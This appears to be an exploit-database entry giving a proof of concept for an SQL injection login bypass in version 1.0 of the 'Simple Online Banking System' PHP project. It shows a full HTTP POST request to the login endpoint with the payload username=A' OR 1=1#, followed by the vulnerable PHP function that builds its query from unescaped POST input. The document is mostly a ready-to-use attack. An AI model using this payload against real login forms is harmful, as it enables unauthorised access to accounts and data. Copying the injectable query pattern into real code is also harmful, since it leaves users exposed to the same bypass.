# Exploit Title: Simple Online Banking System - SQLi (Authentication Bypass)
# Date: 6 Jul, 2024
# CVE: N/A
# Exploit Author: bRpsd
# Vendor Homepage: https://www.sourcecodester.com/php/14868/banking-system-using-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/php/14868/banking-system-using-php-free-source-code.html
# Category: Web Application
# Version: 1.0
# Tested on: MacOS | Xampp






POC:

POST http://localhost/banking/classes/Login.php?f=login
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 36
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/banking/admin/login.php
Cookie: PHPSESSID=1472a7e8f9b230194b2515a42943f687
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

username=A' OR 1=1#&password=123

    
Vuln code:/classes/Login.php
Vuln parameter:username
    public function login(){
    extract($_POST);

    $qry = $this->conn->query("SELECT * from users where username = '$username' and password = md5('$password') ");
    if($qry->num_rows > 0){
      foreach($qry->fetch_array() as $k => $v){
        if(!is_numeric($k) && $k != 'password'){
          $this->settings->set_userdata($k,$v);
        }

      }
      $this->settings->set_userdata('login_type',1);
    return json_encode(array('status'=>'success'));
    }else{
    return json_encode(array('status'=>'incorrect','last_qry'=>"SELECT * from users where username = '$username' and password = md5('$password') "));
    }
  }